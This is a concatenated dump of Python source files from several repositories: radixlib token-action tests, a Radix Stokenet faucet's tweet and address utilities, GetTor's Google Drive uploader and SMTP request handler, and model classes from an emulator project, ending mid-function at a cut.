from typing import Dict, Any
import unittest
class TestMintTokensAction(unittest.TestCase):
""" Unit tests for the MintTokens action of mutable tokens """
ActionDict: Dict[str, Any] = {
"to_account": {
"address": "tdx1qspqqecwh3tgsgz92l4d4f0e4egmfe86049dj75pgq347fkkfmg84pgx9um0v"
},
"amount": {
"value": "10000000000000000000",
"token_identifier": {
"rri": "mutable_tr1q06dd0ut3qmyp4pqkvmeu2dvkwg5f7vm8yeslwvpkt9qcl5vqu"
}
},
"type": "MintTokens"
}
def test_from_dict(self):
""" Tests the derivation of the mainnet wallet addresses from the public key """
# The action loaded from the dictionary
mint: MintTokens = MintTokens.from_dict(self.ActionDict)
# Asserting that the MintTokens object understood the content of the dictionary
self.assertEqual(mint.to_account.address, self.ActionDict['to_account']['address'])
self.assertEqual(mint.amount, int(self.ActionDict['amount']['value']))
self.assertEqual(mint.token_rri, self.ActionDict['amount']['token_identifier']['rri'])
def test_to_dict(self):
""" Tests the conversion of the token account to a dictionary """
# The account loaded from the dictionary
account: MintTokens = MintTokens.from_dict(self.ActionDict)
self.assertEqual(account.to_dict(), self.ActionDict)
```
#### File: tests/actions/test_mutable_token_action.py
```python
from radixlib.actions import CreateTokenDefinition
from typing import Dict, Any
import unittest
class TestMutableTokenAction(unittest.TestCase):
""" Unit tests for the CreateTokenDefinition action of mutable tokens """
ActionDict: Dict[str, Any] = {
"token_properties": {
"name": "MutableTest",
"description": "An amazing new token with great utility!",
"icon_url": "https://www.google.com/",
"url": "https://www.google.com/",
"symbol": "mutable",
"is_supply_mutable": True,
"granularity": "1",
"owner": {
"address": "tdx1qspqqecwh3tgsgz92l4d4f0e4egmfe86049dj75pgq347fkkfmg84pgx9um0v"
}
},
"token_supply": {
"value": "0",
"token_identifier": {
"rri": "mutable_tr1q06dd0ut3qmyp4pqkvmeu2dvkwg5f7vm8yeslwvpkt9qcl5vqu"
}
},
"type": "CreateTokenDefinition"
}
def test_from_dict(self):
""" Tests the derivation of the mainnet wallet addresses from the public key """
# The action loaded from the dictionary
creation: CreateTokenDefinition = CreateTokenDefinition.from_dict(self.ActionDict)
# Asserting that the CreateTokenDefinition object understood the content of the dictionary
self.assertEqual(creation.name, self.ActionDict['token_properties']['name'])
self.assertEqual(creation.description, self.ActionDict['token_properties']['description'])
self.assertEqual(creation.icon_url, self.ActionDict['token_properties']['icon_url'])
self.assertEqual(creation.url, self.ActionDict['token_properties']['url'])
self.assertEqual(creation.symbol, self.ActionDict['token_properties']['symbol'])
self.assertEqual(creation.is_supply_mutable, self.ActionDict['token_properties']['is_supply_mutable'])
self.assertEqual(creation.granularity, int(self.ActionDict['token_properties']['granularity']))
self.assertEqual(creation.owner.address, self.ActionDict['token_properties']['owner']['address'])
self.assertEqual(creation.token_supply, int(self.ActionDict['token_supply']['value']))
self.assertEqual(creation.token_rri, self.ActionDict['token_supply']['token_identifier']['rri'])
self.assertEqual(creation.to_account, None)
def test_to_dict(self):
""" Tests the conversion of the token account to a dictionary """
# The account loaded from the dictionary
account: CreateTokenDefinition = CreateTokenDefinition.from_dict(self.ActionDict)
self.assertEqual(account.to_dict(), self.ActionDict)
```
#### File: tests/actions/test_transfer_tokens_action.py
```python
from radixlib.actions import TransferTokens
from typing import Dict, Any
import unittest
class TestTransferTokensAction(unittest.TestCase):
""" Unit tests for the TransferTokens action of mutable tokens """
ActionDict: Dict[str, Any] = {
"from_account": {
"address": "tdx1qspqqecwh3tgsgz92l4d4f0e4egmfe86049dj75pgq347fkkfmg84pgx9um0v"
},
"to_account": {
"address": "tdx1qspsl85c9cpgm8t906zewv66quyg6d4gdlru2q9ujgk0u66c8kw2t6caan5qa"
},
"amount": {
"value": "100000000000000000000",
"token_identifier": {
"rri": "xrd_tr1qyf0x76s"
}
},
"type": "TransferTokens"
}
def test_from_dict(self):
""" Tests the derivation of the mainnet wallet addresses from the public key """
# The action loaded from the dictionary
mint: TransferTokens = TransferTokens.from_dict(self.ActionDict)
# Asserting that the TransferTokens object understood the content of the dictionary
self.assertEqual(mint.to_account.address, self.ActionDict['to_account']['address'])
self.assertEqual(mint.from_account.address, self.ActionDict['from_account']['address'])
self.assertEqual(mint.amount, int(self.ActionDict['amount']['value']))
self.assertEqual(mint.token_rri, self.ActionDict['amount']['token_identifier']['rri'])
def test_to_dict(self):
""" Tests the conversion of the token account to a dictionary """
# The account loaded from the dictionary
account: TransferTokens = TransferTokens.from_dict(self.ActionDict)
self.assertEqual(account.to_dict(), self.ActionDict)
```
#### File: tests/api_types/test_state_identifier.py
```python
from radixlib.api_types.identifiers import StateIdentifier
import dateparser
import unittest
class TestStateIdentifier(unittest.TestCase):
""" Unit tests for the StateIdentifier class """
def test_all_missing(self):
""" Testing the case where a state identifier is passed with all missing arguments """
# Creating the state identifier
state_identifier: StateIdentifier = StateIdentifier()
self.assertEqual(state_identifier.to_dict(), {})
def test_only_version(self):
""" Testing the case where only a version is given. """
# Creating the state identifier
state_identifier: StateIdentifier = StateIdentifier(
version = 123922
)
self.assertEqual(state_identifier.to_dict(), {"version": 123922})
def test_only_timestamp(self):
""" Testing the case where only a timestamp is given. """
# Creating the state identifier
state_identifier: StateIdentifier = StateIdentifier(
timestamp = dateparser.parse('2022-02-01T11:28:53.707Z')
)
self.assertEqual(state_identifier.to_dict(), {"timestamp": "2022-02-01T11:28:53.707Z"})
def test_only_epoch(self):
""" Testing the case where only an epoch is given. """
# Creating the state identifier
state_identifier: StateIdentifier = StateIdentifier(
epoch = 322,
)
self.assertEqual(state_identifier.to_dict(), {"epoch": 322})
def test_only_epoch_and_round(self):
""" Testing the case where only an epoch and round are given. """
# Creating the state identifier
state_identifier: StateIdentifier = StateIdentifier(
epoch = 322,
round = 12
)
self.assertEqual(state_identifier.to_dict(), {"epoch": 322, "round": 12})
def test_only_round_given(self):
    """ Testing the case where only a round is given """
    # Creating the state identifier with only a round must fail
    with self.assertRaises(ValueError):
        StateIdentifier(
            round = 12
        )
def test_only_timestamp_and_epoch(self):
    """ Testing the case where a timestamp and a round are given together """
    # Creating the state identifier with this combination must fail
    with self.assertRaises(ValueError):
        StateIdentifier(
            timestamp = dateparser.parse('2022-02-01T11:28:53.707Z'),
            round = 12,
        )
``` |
{
"source": "0xOmarA/RadixStokenetFaucet",
"score": 4
} |
#### File: RadixStokenetFaucet/faucet_app/utils.py
```python
from typing import Dict, Optional, Union, List
from faucet_proj import secrets
import dateparser
import validators
import requests
import re
def load_tweet_info(tweet_id: Union[int, str]) -> dict:
"""
This method is used to load the information for a given tweet through the twitter
API and the bearer token saved in the secrets.py file.
# Arguments
* `tweet_id: Union[int, str]` - An integer or string of the tweet id
# Returns
* `dict` - A dictionary containing the information of this given tweet.
# Raises
* `Exception` - A generic exception is raised if an error is encountered when we query
the API for the tweet's information.
"""
# Making the request to the twitter API for the information that we need
response: requests.Response = requests.get(
url = f"https://api.twitter.com/2/tweets/{tweet_id}",
headers = {
"Authorization": f"Bearer {secrets.twitter_bearer_token}"
},
params = {
"tweet.fields": ",".join(["created_at", "author_id"]),
"expansions": ",".join(["author_id"]),
"user.fields": ",".join(["created_at"]),
}
)
response_json: dict = response.json()
# Checking if there had been an error when retrieving the information for
# this tweet. If there had been, we throw a generic `Exception`. We need to
# check for errors using the 'error' key in the json response because the
# status code returned from the twitter API is 200 even if the tweet is not
# found.
if 'errors' in response_json.keys():
raise Exception(f"An error has occured while getting the information of the tweet. Error: {response_json}")
user_object: Dict[str, str] = list(filter(lambda x: x['id'] == response_json['data']['author_id'], response_json['includes']['users']))[0]
return {
"author_id": int(user_object['id']),
"username": user_object['username'],
"name_of_user": user_object['name'],
"tweet_id": int(response_json['data']['id']),
"tweet_text": response_json['data']['text'],
"tweet_created_at": dateparser.parse(response_json['data']['created_at']),
"user_created_at": dateparser.parse(user_object['created_at']),
}
def extract_tweet_id(string: str) -> Optional[int]:
"""
This method is used to search for the tweet id in a given string and return it.
# Arguments
* `string: str` - A string to look for the tweet id in.
# Returns
* `Optional[int]` - Returns an integer of the tweet id when it is found. If it's not
found then None is returned.
"""
matches: list = list(map(int, re.findall(r'twitter\.com\/.*\/status(?:es)?\/([^\/\?]+)', string)))
return None if not matches else matches[0]
def extract_stokenet_addresses(string: str) -> List[str]:
"""
A method which is used to extract all of the stokenet addresses from a given string
# Arguments
* `string: str` - The string to look for the testnet addresses in.
# Returns
* `List[str]` - A list of strings of the stokenet addresses found in the string
"""
return re.findall(
pattern = r'(tdx[0-9]?1[023456789ACDEFGHJKLMNPQRSTUVWXYZacdefghjklmnpqrstuvwxyz]{6,69})',
string = string
)
def is_valid_url(string: str) -> bool:
"""
A simple method which checks if a given string is a valid url or not.
# Arguments
* `string: str` - A string of the potential url.
# Returns
* `bool` - A boolean of whether the given url is a valid url or not.
"""
return bool(validators.url(string))
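# --- Usage sketch (not part of the original module) ---
# A hedged example of the extraction helpers above; the tweet URL, id and text
# are made up purely for illustration.
sample_tweet_url = "https://twitter.com/someuser/status/1489000000000000000?s=20"
tweet_id = extract_tweet_id(sample_tweet_url)       # -> 1489000000000000000
sample_tweet_text = "Requesting testnet tokens for tdx1qspqqecwh3tgsgz92l4d4f0e4egmfe86049dj75pgq347fkkfmg84pgx9um0v"
addresses = extract_stokenet_addresses(sample_tweet_text)   # -> ['tdx1qspqqecwh3...']
url_ok = is_valid_url(sample_tweet_url)             # -> True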
``` |
{
"source": "0xPoly/gettor",
"score": 2
} |
#### File: 0xPoly/gettor/bundles2drive.py
```python
import re
import os
import gnupg
import hashlib
import ConfigParser
import gettor.core
#import google drive libs
import httplib2
from apiclient.discovery import build
from apiclient.http import MediaFileUpload
from apiclient import errors
from oauth2client.client import FlowExchangeError
from oauth2client.client import OAuth2WebServerFlow
from oauth2client.client import Credentials
def valid_format(file, osys):
"""Check for valid bundle format
Check if the given file has a valid bundle format
(e.g. tor-browser-linux32-3.6.2_es-ES.tar.xz)
:param: file (string) the name of the file.
:param: osys (string) the OS.
:return: (boolean) true if the bundle format is valid, false otherwise.
"""
if(osys == 'windows'):
m = re.search(
'torbrowser-install-\d\.\d\.\d_\w\w(-\w\w)?\.exe',
file)
elif(osys == 'linux'):
m = re.search(
'tor-browser-linux\d\d-\d\.\d\.\d_(\w\w)(-\w\w)?\.tar\.xz',
file)
elif(osys == 'osx'):
m = re.search(
'TorBrowser-\d\.\d\.\d-osx\d\d_(\w\w)(-\w\w)?\.dmg',
file)
if m:
return True
else:
return False
def get_bundle_info(file, osys):
"""Get the os, arch and lc from a bundle string.
:param: file (string) the name of the file.
:param: osys (string) the OS.
:raise: ValueError if the bundle doesn't have a valid bundle format.
:return: (list) the os, arch and lc.
"""
if(osys == 'windows'):
m = re.search(
'torbrowser-install-\d\.\d\.\d_(\w\w)(-\w\w)?\.exe',
file)
if m:
lc = m.group(1)
return 'windows', '32/64', lc
else:
raise ValueError("Invalid bundle format %s" % file)
elif(osys == 'linux'):
m = re.search(
'tor-browser-linux(\d\d)-\d\.\d\.\d_(\w\w)(-\w\w)?\.tar\.xz',
file)
if m:
arch = m.group(1)
lc = m.group(2)
return 'linux', arch, lc
else:
raise ValueError("Invalid bundle format %s" % file)
elif(osys == 'osx'):
m = re.search(
'TorBrowser-\d\.\d\.\d-osx(\d\d)_(\w\w)(-\w\w)?\.dmg',
file)
if m:
os = 'osx'
arch = m.group(1)
lc = m.group(2)
return 'osx', arch, lc
else:
raise ValueError("Invalid bundle format %s" % file)
def get_file_sha256(file):
"""Get the sha256 of a file.
:param: file (string) the path of the file.
:return: (string) the sha256 hash.
"""
# as seen on the internetz
BLOCKSIZE = 65536
hasher = hashlib.sha256()
with open(file, 'rb') as afile:
buf = afile.read(BLOCKSIZE)
while len(buf) > 0:
hasher.update(buf)
buf = afile.read(BLOCKSIZE)
return hasher.hexdigest()
def upload_files(client, basedir):
"""Upload files to Google Drive.
Looks for tor browser files inside basedir.
:param: basedir (string) path of the folder with the files to be
uploaded.
:param: client (object) Google Drive object.
:raise: UploadError if something goes wrong while uploading the
files to Google Drive. All files are uploaded to '/'.
:return: (dict) the names of the uploaded files as the keys,
and file id as the value
"""
files = []
p = re.compile('.*\.tar.xz$')
for name in os.listdir(basedir):
path = os.path.abspath(os.path.join(basedir, name))
if os.path.isfile(path) and p.match(path)\
and valid_format(name, 'linux'):
files.append(name)
p = re.compile('.*\.exe$')
for name in os.listdir(basedir):
path = os.path.abspath(os.path.join(basedir, name))
if os.path.isfile(path) and p.match(path)\
and valid_format(name, 'windows'):
files.append(name)
p = re.compile('.*\.dmg$')
for name in os.listdir(basedir):
path = os.path.abspath(os.path.join(basedir, name))
if os.path.isfile(path) and p.match(path)\
and valid_format(name, 'osx'):
files.append(name)
# dictionary to store file names and IDs
files_dict = dict()
for file in files:
asc = "%s.asc" % file
abs_file = os.path.abspath(os.path.join(basedir, file))
abs_asc = os.path.abspath(os.path.join(basedir, asc))
if not os.path.isfile(abs_asc):
# there are some .mar files that don't have .asc, don't upload it
continue
# upload tor browser installer
file_body = MediaFileUpload(abs_file, resumable=True)
body = {
'title': file
}
print "Uploading '%s'..." % file
try:
file_data = client.files().insert(body=body, media_body=file_body).execute()
except errors.HttpError, e:
print str(e)
# upload signature
asc_body = MediaFileUpload(abs_asc, resumable=True)
asc_head = {
'title': "%s.asc" % file
}
print "Uploading '%s'..." % asc
try:
asc_data = client.files().insert(body=asc_head, media_body=asc_body).execute()
except errors.HttpError, e:
print str(e)
# add filenames and file id to dict
files_dict[file] = file_data['id']
files_dict[asc] = asc_data['id']
return files_dict
def share_file(service, file_id):
"""Make files public
For a given file-id, sets role 'reader' to 'anyone'. Returns public
link to file.
:param: file_id (string)
:return: (string) url to shared file
"""
permission = {
'type': "anyone",
'role': "reader",
'withLink': True
}
try:
service.permissions().insert(
fileId=file_id, body=permission).execute()
except errors.HttpError, error:
print('An error occurred while sharing: %s' % file_id)
try:
file = service.files().get(fileId=file_id).execute()
except errors.HttpError, error:
print('An error occurred while fetching the public link for file: %s' % file_id)
print("Uploaded to %s" % file['webContentLink'])
return file['webContentLink']
if __name__ == '__main__':
config = ConfigParser.ConfigParser()
config.read('drive.cfg')
client_id = config.get('app', 'client-id')
app_secret = config.get('app', 'secret')
refresh_token = config.get('app', 'refresh_token')
upload_dir = config.get('general', 'upload_dir')
# important: this key must be the one that signed the packages
tbb_key = config.get('general', 'tbb_key')
# requests full access to drive account
OAUTH_SCOPE = 'https://www.googleapis.com/auth/drive'
REDIRECT_URI = 'urn:ietf:wg:oauth:2.0:oob'
print "Authenticating..."
flow = OAuth2WebServerFlow(client_id, app_secret, OAUTH_SCOPE,
redirect_uri=REDIRECT_URI)
# If no valid token found, need to prompt user.
# this should only occur once
if not refresh_token:
flow.params['access_type'] = 'offline'
flow.params['approval_prompt'] = 'force'
authorize_url = flow.step1_get_authorize_url()
print 'Go to the following link in your browser: ' + authorize_url
code = raw_input('Enter verification code: ').strip()
try:
credentials = flow.step2_exchange(code)
except FlowExchangeError as e:
print str(e)
# oauth2 credentials instance must be stored as json string
config.set('app', 'refresh_token', credentials.to_json())
with open('drive.cfg', 'wb') as configfile:
config.write(configfile)
else:
# we already have a valid token
credentials = Credentials.new_from_json(refresh_token)
# authenticate with oauth2
http = httplib2.Http()
http = credentials.authorize(http)
# initialize drive instance
drive_service = build('drive', 'v2', http=http)
# import key fingerprint
gpg = gnupg.GPG()
key_data = open(tbb_key).read()
import_result = gpg.import_keys(key_data)
fp = import_result.results[0]['fingerprint']
# make groups of four characters to make fingerprint more readable
# e.g. 123A 456B 789C 012D 345E 678F 901G 234H 567I 890J
readable = ' '.join(fp[i:i+4] for i in xrange(0, len(fp), 4))
try:
uploaded_files = upload_files(drive_service, upload_dir)
# use default config
core = gettor.core.Core('/home/gettor/core.cfg')
# erase old links
core.create_links_file('Drive', readable)
# recognize file OS by its extension
        p1 = re.compile(r'.*\.tar\.xz$')
        p2 = re.compile(r'.*\.exe$')
        p3 = re.compile(r'.*\.dmg$')
        p4 = re.compile(r'.*\.asc$')
for file in uploaded_files.keys():
# only run for tor browser installers
if p4.match(file):
continue
asc = "%s.asc" % file
abs_file = os.path.abspath(os.path.join(upload_dir, file))
abs_asc = os.path.abspath(os.path.join(upload_dir, asc))
sha_file = get_file_sha256(abs_file)
# build links
link_file = share_file(drive_service,
uploaded_files[file])
link_asc = share_file(drive_service,
uploaded_files["%s.asc" % file])
if p1.match(file):
osys, arch, lc = get_bundle_info(file, 'linux')
elif p2.match(file):
osys, arch, lc = get_bundle_info(file, 'windows')
elif p3.match(file):
osys, arch, lc = get_bundle_info(file, 'osx')
link = "Package (%s-bit): %s\nASC signature (%s-bit): %s\n"\
"Package SHA256 checksum (%s-bit): %s\n" %\
(arch, link_file, arch, link_asc,
arch, sha_file)
# note that you should only upload bundles for supported locales
core.add_link('Drive', osys, lc, link)
except (ValueError, RuntimeError) as e:
print str(e)
```
#### File: gettor/gettor/smtp.py
```python
import os
import re
import sys
import time
import email
import gettext
import logging
import smtplib
import datetime
import ConfigParser
from email.mime.text import MIMEText
import core
import utils
import blacklist
"""SMTP module for processing email requests."""
class ConfigError(Exception):
pass
class AddressError(Exception):
pass
class SendEmailError(Exception):
pass
class InternalError(Exception):
pass
class SMTP(object):
"""Receive and reply requests by email.
Public methods:
process_email(): Process the email received.
Exceptions:
ConfigError: Bad configuration.
AddressError: Address of the sender malformed.
SendEmailError: SMTP server not responding.
InternalError: Something went wrong internally.
"""
def __init__(self, cfg=None):
"""Create new object by reading a configuration file.
:param: cfg (string) path of the configuration file.
"""
# define a set of default values
DEFAULT_CONFIG_FILE = 'smtp.cfg'
logging.basicConfig(format='[%(levelname)s] %(asctime)s - %(message)s',
datefmt="%Y-%m-%d %H:%M:%S")
log = logging.getLogger(__name__)
config = ConfigParser.ConfigParser()
if cfg is None or not os.path.isfile(cfg):
cfg = DEFAULT_CONFIG_FILE
config.read(cfg)
try:
self.our_domain = config.get('general', 'our_domain')
except ConfigParser.Error as e:
raise ConfigError("Couldn't read 'our_domain' from 'general'")
try:
core_cfg = config.get('general', 'core_cfg')
except ConfigParser.Error as e:
raise ConfigError("Couldn't read 'core_cfg' from 'general'")
try:
blacklist_cfg = config.get('blacklist', 'cfg')
self.bl = blacklist.Blacklist(blacklist_cfg)
except ConfigParser.Error as e:
raise ConfigError("Couldn't read 'cfg' from 'blacklist'")
try:
self.bl_max_req = config.get('blacklist', 'max_requests')
self.bl_max_req = int(self.bl_max_req)
except ConfigParser.Error as e:
raise ConfigError("Couldn't read 'max_requests' from 'blacklist'")
try:
self.bl_wait_time = config.get('blacklist', 'wait_time')
self.bl_wait_time = int(self.bl_wait_time)
except ConfigParser.Error as e:
raise ConfigError("Couldn't read 'wait_time' from 'blacklist'")
try:
self.i18ndir = config.get('i18n', 'dir')
except ConfigParser.Error as e:
raise ConfigError("Couldn't read 'dir' from 'i18n'")
try:
logdir = config.get('log', 'dir')
logfile = os.path.join(logdir, 'smtp.log')
except ConfigParser.Error as e:
raise ConfigError("Couldn't read 'dir' from 'log'")
try:
loglevel = config.get('log', 'level')
except ConfigParser.Error as e:
            raise ConfigError("Couldn't read 'level' from 'log'")
# use default values
self.core = core.Core(core_cfg)
# establish log level and redirect to log file
log.info('Redirecting logging to %s' % logfile)
logfileh = logging.FileHandler(logfile, mode='a+')
logfileh.setLevel(logging.getLevelName(loglevel))
log.addHandler(logfileh)
# stop logging on stdout from now on
log.propagate = False
def _is_blacklisted(self, addr):
"""Check if a user is blacklisted.
:param: addr (string) the hashed address of the user.
        :return: true if the address is blacklisted, false otherwise.
"""
try:
self.bl.is_blacklisted(addr, 'SMTP', self.bl_max_req,
self.bl_wait_time)
return False
except blacklist.BlacklistError as e:
return True
def _get_lc(self, addr):
"""Get the locale from an email address.
Process the email received and look for the locale in the recipient
address (e.g. <EMAIL>). If no locale found, english
by default.
:param: (string) the email address we want to get the locale from.
:return: (string) the locale (english if none).
"""
# if no match found, english by default
lc = 'en'
# look for <EMAIL>
        m = re.match(r'gettor\+(\w\w)@\w+\.\w+', addr)
if m:
# we found a request for locale lc
lc = "%s" % m.groups()
return lc.lower()
def _get_normalized_address(self, addr):
"""Get normalized address.
We look for anything inside the last '<' and '>'. Code taken from
the old GetTor (utils.py).
:param: addr (string) the address we want to normalize.
:raise: AddressError if the address can't be normalized.
:return: (string) the normalized address.
"""
if '<' in addr:
idx = addr.rindex('<')
addr = addr[idx:]
m = re.search(r'<([^>]*)>', addr)
if m is None:
# malformed address
            raise AddressError("Couldn't extract normalized address "
                               "from %s" % utils.get_sha256(addr))
addr = m.group(1)
return addr
def _get_content(self, email):
"""Get the body content of an email.
:param: email (object) the email object to extract the content from.
:return: (string) body of the message.
"""
# get the body content of the email
maintype = email.get_content_maintype()
if maintype == 'multipart':
for part in email.get_payload():
if part.get_content_maintype() == 'text':
return part.get_payload()
elif maintype == 'text':
return email.get_payload()
def _get_msg(self, msgid, lc):
"""Get message identified by msgid in a specific locale.
:param: msgid (string) the identifier of a string.
:param: lc (string) the locale.
:return: (string) the message from the .po file.
"""
# obtain the content in the proper language
t = gettext.translation(lc, self.i18ndir, languages=[lc])
_ = t.ugettext
msgstr = _(msgid)
return msgstr
def _parse_email(self, msg, addr):
"""Parse the email received.
Get the locale and parse the text for the rest of the info.
:param: msg (string) the content of the email to be parsed.
:param: addr (string) the address of the recipient (i.e. us).
        :return: (dict) the locale, the os and the type of request.
"""
req = self._parse_text(msg)
lc = self._get_lc(addr)
req['lc'] = lc
return req
def _parse_text(self, msg):
"""Parse the text part of the email received.
Try to figure out what the user is asking, namely, the type
of request, the package and os required (if applies).
:param: msg (string) the content of the email to be parsed.
        :return: (dict) the type of request and the os (if applicable).
"""
        # by default we assume the request is asking for help
req = {}
req['type'] = 'help'
req['os'] = None
# core knows what OS are supported
supported_os = self.core.get_supported_os()
# if no OS is found, help request by default
        # if both OS and checksum request found, the first one takes precedence
found_os = False
found_checksums = False
lines = msg.split(' ')
for word in lines:
if not found_os and not found_checksums:
for os in supported_os:
if re.match(os, word, re.IGNORECASE):
req['os'] = os
req['type'] = 'links'
found_os = True
break
elif re.match("checksum", word, re.IGNORECASE):
req['type'] = 'checksums'
req['os'] = None
found_checksums = True
break
else:
break
return req
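    # Illustrative sketch of the parsing above (an assumption, not part of the
    # original module; the recognised OS keywords come from
    # core.get_supported_os()):
    #   "please send me windows" -> {'type': 'links', 'os': 'windows'}
    #   "checksum"               -> {'type': 'checksums', 'os': None}
    #   "hello"                  -> {'type': 'help', 'os': None}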
def _create_email(self, from_addr, to_addr, subject, msg):
"""Create an email object.
This object will be used to construct the reply.
:param: from_addr (string) the address of the sender.
:param: to_addr (string) the address of the recipient.
:param: subject (string) the subject of the email.
:param: msg (string) the content of the email.
:return: (object) the email object.
"""
email_obj = MIMEText(msg)
email_obj.set_charset("utf-8")
email_obj['Subject'] = subject
email_obj['From'] = from_addr
email_obj['To'] = to_addr
return email_obj
def _send_email(self, from_addr, to_addr, subject, msg):
"""Send an email.
Take a 'from' and 'to' addresses, a subject and the content, creates
the email and send it.
:param: from_addr (string) the address of the sender.
:param: to_addr (string) the address of the recipient.
:param: subject (string) the subject of the email.
:param: msg (string) the content of the email.
"""
email_obj = self._create_email(from_addr, to_addr, subject, msg)
try:
s = smtplib.SMTP("localhost")
s.sendmail(from_addr, to_addr, email_obj.as_string())
s.quit()
except smtplib.SMTPException as e:
raise SendEmailError("Error with SMTP: %s" % str(e))
def _send_links(self, links, lc, os, from_addr, to_addr):
"""Send links to the user.
Get the message in the proper language (according to the locale),
replace variables and send the email.
:param: links (string) the links to be sent.
:param: lc (string) the locale.
:param: os (string) the operating system.
:param: from_addr (string) the address of the sender.
:param: to_addr (string) the address of the recipient.
"""
# obtain the content in the proper language and send it
links_subject = self._get_msg('links_subject', lc)
links_msg = self._get_msg('links_msg', lc)
links_msg = links_msg % (os, lc, links)
try:
self._send_email(from_addr, to_addr, links_subject, links_msg)
except SendEmailError as e:
raise InternalError("Error while sending links message")
def _send_help(self, lc, from_addr, to_addr):
"""Send help message.
Get the message in the proper language (according to the locale),
replace variables (if any) and send the email.
:param: lc (string) the locale.
:param: from_addr (string) the address of the sender.
:param: to_addr (string) the address of the recipient.
"""
# obtain the content in the proper language and send it
help_subject = self._get_msg('help_subject', lc)
help_msg = self._get_msg('help_msg', lc)
try:
self._send_email(from_addr, to_addr, help_subject, help_msg)
except SendEmailError as e:
raise InternalError("Error while sending help message")
    def _send_checksums(self, checksums, lc, from_addr, to_addr):
        """Send checksums message.
        Get the message in the proper language (according to the locale),
        replace variables (if any) and send the email.
        :param: checksums (string) the checksums to be sent.
        :param: lc (string) the locale.
:param: from_addr (string) the address of the sender.
:param: to_addr (string) the address of the recipient.
"""
# obtain the content in the proper language and send it
checksums_subject = self._get_msg('checksums_subject', lc)
checksums_msg = self._get_msg('checksums_msg', lc)
checksums_msg = checksums_msg % checksums
try:
self._send_email(from_addr, to_addr, checksums_subject, checksums_msg)
except SendEmailError as e:
            raise InternalError("Error while sending checksums message")
def _send_unsupported_lc(self, lc, os, from_addr, to_addr):
"""Send unsupported locale message.
Get the message for unsupported locale in english, replace variables
(if any) and send the email.
:param: lc (string) the locale.
:param: os (string) the operating system.
:param: from_addr (string) the address of the sender.
:param: to_addr (string) the address of the recipient.
"""
# obtain the content in english and send it
un_lc_subject = self._get_msg('unsupported_lc_subject', 'en')
un_lc_msg = self._get_msg('unsupported_lc_msg', 'en')
un_lc_msg = un_lc_msg % lc
try:
self._send_email(from_addr, to_addr, un_lc_subject, un_lc_msg)
except SendEmailError as e:
raise InternalError("Error while sending unsupported lc message")
def process_email(self, raw_msg):
"""Process the email received.
Create an email object from the string received. The processing
flow is as following:
- check for blacklisted address.
- parse the email.
- check the type of request.
- send reply.
:param: raw_msg (string) the email received.
:raise: InternalError if something goes wrong while asking for the
links to the Core module.
"""
parsed_msg = email.message_from_string(raw_msg)
content = self._get_content(parsed_msg)
from_addr = parsed_msg['From']
to_addr = parsed_msg['To']
bogus_request = False
status = ''
req = None
try:
# two ways for a request to be bogus: address malformed or
# blacklisted
try:
norm_from_addr = self._get_normalized_address(from_addr)
except AddressError as e:
status = 'malformed'
bogus_request = True
# it might be interesting to know what triggered this
# we are not logging this for now
# logfile = self._log_email('malformed', content)
if norm_from_addr:
anon_addr = utils.get_sha256(norm_from_addr)
if self._is_blacklisted(anon_addr):
status = 'blacklisted'
bogus_request = True
# it might be interesting to know extra info
# we are not logging this for now
# logfile = self._log_email(anon_addr, content)
if not bogus_request:
# try to figure out what the user is asking
req = self._parse_email(content, to_addr)
# our address should have the locale requested
our_addr = "gettor+%s@%s" % (req['lc'], self.our_domain)
# three possible options: asking for help, checksums or links
if req['type'] == 'help':
# make sure we can send emails
try:
self._send_help(req['lc'], our_addr, norm_from_addr)
except SendEmailError as e:
status = 'internal_error'
raise InternalError("Something's wrong with the SMTP "
"server: %s" % str(e))
elif req['type'] == 'checksums':
try:
checksums = self.core.get_checksums(req['lc'])
except (core.InternalError, core.ConfigurationError) as e:
status = 'core_error'
# something went wrong with the core
raise InternalError("Error obtaining the checksums")
                    # make sure we can send emails
try:
self._send_checksums(checksums, req['lc'], our_addr, norm_from_addr)
except SendEmailError as e:
status = 'internal_error'
                        raise InternalError("Something's wrong with the SMTP "
"server: %s" % str(e))
elif req['type'] == 'links':
try:
links = self.core.get_links('SMTP', req['os'],
req['lc'])
except core.UnsupportedLocaleError as e:
# if we got here, the address of the sender should
# be valid so we send him/her a message about the
# unsupported locale
status = 'unsupported_lc'
self._send_unsupported_lc(req['lc'], req['os'],
our_addr, norm_from_addr)
return
# if core fails, we fail too
except (core.InternalError, core.ConfigurationError) as e:
status = 'core_error'
# something went wrong with the core
raise InternalError("Error obtaining the links")
# make sure we can send emails
try:
self._send_links(links, req['lc'], req['os'], our_addr,
norm_from_addr)
except SendEmailError as e:
status = 'internal_error'
raise SendEmailError("Something's wrong with the SMTP "
"server: %s" % str(e))
status = 'success'
finally:
# keep stats
if req:
self.core.add_request_to_db()
```
#### File: gettor/gettor/utils.py
```python
import os
import hashlib
"""Common utilities for GetTor modules."""
def get_sha256(string):
"""Get sha256 of a string.
:param: (string) the string to be hashed.
:return: (string) the sha256 of string.
"""
return str(hashlib.sha256(string).hexdigest())
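# Illustrative only (not part of the original module): under Python 2, where
# str is a byte string, get_sha256('gettor') returns the 64-character hex
# digest of that string.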
``` |
{
"source": "0xporky/mgnemu",
"score": 3
} |
#### File: mgnemu/models/base_model.py
```python
from mgnemu.models.sales_types import SALES_TYPES
class BaseModel(object):
__id = 0
def __init__(self, model_type):
self.__type = model_type
if model_type in SALES_TYPES:
BaseModel.inc_id()
@staticmethod
def inc_id():
BaseModel.__id += 1
@staticmethod
def reset_id():
BaseModel.__id = 0
@staticmethod
def check_id():
return BaseModel.__id
@property
def model_type(self):
return self.__type
def dumps(self, object_data):
pass
def gen_check(self):
return {}
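# Illustrative sketch of the shared counter (not part of the original module):
# every BaseModel built with a type listed in SALES_TYPES bumps the class-wide
# id, so consecutive receipts get a monotonically increasing check id.
#
#   BaseModel.reset_id()
#   BaseModel(SALES_TYPES[0])   # assuming SALES_TYPES is an indexable, non-empty collection
#   BaseModel.check_id()        # -> 1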
```
#### File: mgnemu/models/cash_operation.py
```python
from mgnemu.models.base_model import BaseModel
from mgnemu.models.sales_types import CASH_RECIEPT
class CashOperation(BaseModel):
def __init__(self, data):
if CASH_RECIEPT in list(data.keys()):
BaseModel.__init__(self, CASH_RECIEPT)
else:
raise KeyError('Unknown check key error.')
self.__data = data[CASH_RECIEPT]
def dumps(self):
return {
'id': BaseModel.check_id(),
self.model_type: self.__data
}
def gen_check(self):
dump = self.dumps()
nums = [1 for cr in dump[CASH_RECIEPT]]
sums = [cr[CASH_RECIEPT]['sum']
